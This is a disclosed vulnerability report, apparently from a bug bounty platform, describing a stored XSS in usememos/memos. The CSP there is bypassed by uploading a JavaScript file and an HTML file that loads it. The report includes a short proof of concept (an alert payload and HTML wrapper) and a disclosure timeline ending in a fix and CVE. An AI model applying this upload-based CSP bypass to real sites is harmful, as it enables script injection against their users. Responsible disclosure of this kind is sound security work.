Stored XSS with CSP bypass through JS file upload in usememos/memos

Valid

Reported on

Dec 26th 2022


Description

I've seen here: https://github.com/usememos/memos/blob/main/server/resource.go#L268 that has been implemented the CSP with "default-src 'self'" configuration. This configuration can be bypassed if I'm able to upload a js file, and then call it from another files while they both resides on the server

Proof of Concept

  • Upload the first file on the resources: test.js
alert(document.domain);
  • Now get the link of this uploaded file, which for me is: http://localhost:5230/o/r/12/test.js
  • Now upload a html file, pointing on that url, made like this:
<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <title>Test</title>
</head>
<script src="http://localhost:5230/o/r/12/test.js"></script>
<body>
</body>
</html>
  • Now get the link to this html file: which for me is http://localhost:5230/o/r/14/test.html
  • Open the file in the browser, and that's the result:

image

Impact

It is possible to obtain a stored XSS bypassing the CSP currently implemented.

We are processing your report and will contact the usememos/memos team within 24 hours. 5 months ago
We have contacted a member of the usememos/memos team and are waiting to hear back 4 months ago
STEVEN validated this vulnerability 4 months ago
leorac has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.10.0 with commit 46c13a 4 months ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 4 months ago
resource.go#L268 has been validated
to join this conversation